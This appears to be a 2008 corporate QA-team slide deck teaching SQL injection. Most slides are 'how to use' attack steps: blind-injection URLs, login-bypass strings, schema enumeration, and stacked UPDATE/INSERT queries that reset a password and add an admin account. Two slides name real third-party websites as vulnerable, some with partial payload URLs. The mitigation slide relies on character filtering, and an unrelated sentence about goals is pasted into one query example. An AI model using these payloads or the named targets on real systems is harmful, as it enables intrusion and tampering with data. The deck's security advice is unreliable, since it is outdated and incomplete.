SQL Injections

Core QA Team
5th March 2008
Agenda

 What is SQL Injection

 SQL Injection possibilities
 Technologies affected by SQL Injections
 Types of SQL Injections
 Techniques in SQL Injections
 How to use Blind SQL Injections
 How to use SQL Injections
 How to use Advanced SQL Injections
 How update data in the Database
 How to avoid SQL Injections
 Next generation of Hacking
 Tools for SQL Injections

2
©Copyright Kenexa® 2004
 What is SQL Injection

• SQL Injection is one of the many web attack mechanisms used by

hackers to steal data from organizations. It is perhaps one of the most
common application layer attack techniques used today. It is the type of
attack that takes advantage of improper coding of your web applications
that allows hacker to inject SQL commands into say a login form to allow
them to gain access to the data held within your database.
• In essence, SQL Injection arises because the fields available for user input
allow SQL statements to pass through and query the database directly.

3
©Copyright Kenexa® 2004
 SQL Injection possibilities

• Using SQL injections, attackers can:

– Add new data to the database
• Could be embarrassing to find yourself selling politically incorrect
items on an eCommerce site
• Perform an INSERT in the injected SQL
– Modify data currently in the database
• Could be very costly to have an expensive item suddenly be deeply
‘discounted’
• Perform an UPDATE in the injected SQL
– Often can gain access to other user’s system capabilities by obtaining
their password

4
©Copyright Kenexa® 2004
Technologies affected by SQL Injections

• JSPASPXML
• XSL JavascriptVB
• MFC and other ODBC-based tools
• APIs3- and 4GL-based languages such as C, OCI, Pro*C, and
COBOL Perl
• CGI scripts that access Oracle databases many more

5
©Copyright Kenexa® 2004
Types of SQL Injections

• Blind SQL injections

• SQL injections
• Advanced SQL injects

6
©Copyright Kenexa® 2004
Techniques in SQL Injections

• Authorization bypass
• Using the SELECT command
• Using the INSERT command
• Using SQL server stored procedures

7
©Copyright Kenexa® 2004
How to use Blind SQL injection

Step1- For instance, many companies allow Internet access to

archives of their press releases. A URL for accessing the company’s
fifth press release might look like this:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5

Step2-For example, if you request this URL

http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
AND 1=1
if this query also returns the same press release, then the
application is susceptible to SQL injection

Step-3 . We can use this behavior to “ask” the database server

true/false questions. For instance, the following request essentially
asks the database server, “Is the current user john?”
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
AND USER_NAME() = ‘john’
8
©Copyright Kenexa® 2004
How to use Blind SQL injection

USER_NAME() is a SQL Server function that returns the name of the current
user. If the current user is dbo (administrator), the fifth press release will be
returned. If not, the query will fail and no press release will be displayed
Step4 - By combining sub queries and functions, we can ask more
complex questions. The following example attempts to retrieve the
name of a database table, one character at a time.
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects
WHERE xtype='U'), 1, 1))) > 109
Step5 - If the server returns the fifth press release in response to this
URL, we know that the first letter of the query’s result comes after
the letter “m” (ASCII character 109) in the alphabet. By making
multiple requests, we can determine the precise ASCII value.

9
©Copyright Kenexa® 2004
How to use Blind SQL injection
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype='U'), 1, 1))) > 116

• Step 6 - If no press release is returned, the ASCII value is greater than

109 but not greater than 116. So, the letter is between “n” (110) and
“t” (116).
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype='U'), 1, 1))) > 113

10
©Copyright Kenexa® 2004
URL’s venerable to Blind SQL Injections
attack

http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%2

http://content-ind.cricinfo.com/wivzimsa/engine/current/match/298809.htm

http://www.minglebox.com/user.do?method=registerUser&error=true%20an
“

11
©Copyright Kenexa® 2004
How to use SQL injections

12
©Copyright Kenexa® 2004
How to use SQL injections

• Here is a sample basic HTML form with two inputs, login and
password.

<form method="post"
action="http://testasp.acunetix.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

• The easiest way for the login.asp to work is by building a database

query that looks like this:
SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’
13
©Copyright Kenexa® 2004
 How to use SQL injections

• If the variables $username and $password are requested directly from

the user's input, this can easily be compromised. Suppose that we gave
"Joe" as a username and that the following string was provided as a
password: anything' OR 'x'='x’

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x' Make sure that your short term
goals will help to achieve the Medium term goals and vice versa.

14
©Copyright Kenexa® 2004
How to use SQL injections

• As the inputs of the web application are not properly sanitised, the
use of the single quotes has turned the WHERE SQL command into a
two-component clause.
• The 'x'='x' part guarantees to be true regardless of what the first
part contains.
• This will allow the attacker to bypass the login form without actually
knowing a valid username / password combination!
• Depending on the actual SQL query, you may have to try some of
these possibilities:
' or 1=1--
or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
15
©Copyright Kenexa® 2004
URL’s venerable to Blind SQL Injections
attack
http://www.osmania.ac.in/ou/res07/20080126.jsp

http://www.powerscrap.com/frame.aspx?Login=true

16
©Copyright Kenexa® 2004
How to use Advanced SQL injects

• The attacker could log in as the first user in the 'users' table, with
the following input:
Username: ' or 1=1--
• The attacker wants to establish the names of the tables that the
query operates on, and the names of the fields. To do this, the
attacker uses the 'having' clause of the 'select' statement:
Username: ' having 1=1–
• So the attacker now knows the table name and column name of the
first column in the query. They can continue through the columns by
introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--

17
©Copyright Kenexa® 2004
How to use Advanced SQL injects
• (which produces the error…)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.username' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35

• Eventually the attacker arrives at the following 'username':

' group by users.id, users.username, users.password, users.privs
having 1=1–
• … which produces no error, and is functionally equivalent to:
select * from users where username = ''

• It would be useful if he could determine the types of each column.

This can be achieved using a 'type conversion' error message, like
this:
Username: ' union select sum(username) from users--
18
©Copyright Kenexa® 2004
How update data in the Database

• When we successfully gather all column name of a table, it is

possible for us to UPDATE or even INSERT a new record in the table.
For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password'
= 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login'
('login_id', 'login_name', 'password', 'details') VALUES
(666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".

19
©Copyright Kenexa® 2004
How to avoid SQL Injections
• Filter out character like single quote, double quote, slash, back
slash, semi colon, extended character like NULL, carry return, new
line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL
statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in
SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

20
©Copyright Kenexa® 2004
Next generation of Hacking

• Ethical Hacking
• Server side scripting
• Client side scripting
• Bluetooth Hacking
• Console Hacking

21
©Copyright Kenexa® 2004
Tools for SQL Injection

• SQID – Sequel Injection Digger

• SQLBrute - SQL Injection Brute Force Tool
• N-Stalker Web Application Security Scanner 2006
• Acunetix Web Vulnerable Scanner
• HP Web Inspect
• Wikto: Web Server Assessment Tool

22
©Copyright Kenexa® 2004
References

http://www.unixwiz.net/techtips/sql-injection.html

http://www.imperva.com/resources/glossary/sql_injection.html

http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanne

23
©Copyright Kenexa® 2004
 24
©Copyright Kenexa® 2004
www.kenexa.com